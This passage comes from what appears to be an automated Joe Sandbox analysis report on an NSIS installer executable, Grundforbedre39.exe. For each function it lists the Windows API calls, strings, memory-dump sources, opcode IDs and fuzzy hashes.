                                                                                      • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrcpyW.KERNEL32(00425D88,NUL), ref: 00405D58
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405EDC,?,?), ref: 00405D7C
                                                                                      • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                                      • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                                                                      • wsprintfA.USER32 ref: 00405DC0
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405DFB
                                                                                      • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405E0A
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                                                                      • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405BF3
                                                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405C15
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                                      • API String ID: 222337774-899692902
                                                                                      • Opcode ID: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                                                      • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                                                                      • Opcode Fuzzy Hash: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                                                      • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                                      • CharNextW.USER32(?,00000000,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                                                      • CharPrevW.USER32(?,?,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004062AF
                                                                                      • "C:\Users\user\Desktop\Grundforbedre39.exe", xrefs: 004062AE
                                                                                      • *?|<>/":, xrefs: 00406300
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-1730066637
                                                                                      • Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                                                      • Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
                                                                                      • Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                                                      • Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                                                                      • GetSysColor.USER32(00000000), ref: 0040417E
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040418A
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404196
                                                                                      • GetSysColor.USER32(?), ref: 004041A9
                                                                                      • SetBkColor.GDI32(?,?), ref: 004041B9
                                                                                      • DeleteObject.GDI32(?), ref: 004041D3
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                                                      • Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
                                                                                      • Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                                                      • Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                                                                      • GetMessagePos.USER32 ref: 00404A66
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404A80
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                                                      • Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
                                                                                      • Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                                                      • Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                      • MulDiv.KERNEL32(000BE468,?,000C0170), ref: 00402D4D
                                                                                      • wsprintfW.USER32 ref: 00402D5D
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402D57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      • Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                                                      • Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
                                                                                      • Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                                                      • Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                      • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                      • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                      • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                      • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                      • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                      • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                      • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405BF3
                                                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405C15
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 00402894
                                                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                        • Part of subcall function 00403222: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00403230
                                                                                      • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004028B0
                                                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                        • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403088
                                                                                        • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403109
                                                                                        • Part of subcall function 00403027: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 00403136
                                                                                        • Part of subcall function 00403027: wsprintfW.USER32 ref: 00403149
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402928
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2082585436-0
                                                                                      • Opcode ID: 8c6766bb6951d215d3c67dc1a7f9f2d38a2e1e8e733af242ff85fa37c0fc3889
                                                                                      • Instruction ID: 181021ac035c2af1142937af2620863fa5f7be1a0242ec6fd4154699f829fb45
                                                                                      • Opcode Fuzzy Hash: 8c6766bb6951d215d3c67dc1a7f9f2d38a2e1e8e733af242ff85fa37c0fc3889
                                                                                      • Instruction Fuzzy Hash: D9219A72804018BFCF11AFA5CD4889E7E79EF08324F24023AF514B62E0C6795D81DBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                                      • wsprintfW.USER32 ref: 004049DF
                                                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$&B
                                                                                      • API String ID: 3540041739-2907463167
                                                                                      • Opcode ID: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                                                      • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                                                                      • Opcode Fuzzy Hash: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                                                      • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp$C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll
                                                                                      • API String ID: 3109718747-288752534
                                                                                      • Opcode ID: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
                                                                                      • Instruction ID: 2aea9811a9a124710f812c99978ab25d5578c47fcc6e4ef6251516289d3ba225
                                                                                      • Opcode Fuzzy Hash: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
                                                                                      • Instruction Fuzzy Hash: 73113A32A41214BEDB10AFB18F4AE9E3264AF94385F20403BF402F61C2D6FC8E41562E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                      • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                                                                      • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                                                                      • Opcode Fuzzy Hash: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                                                                      • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401D59
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                      • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID:
                                                                                      • API String ID: 3808545654-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      • lstrlenW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B2F
                                                                                      • GetFileAttributesW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\), ref: 00405B3F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
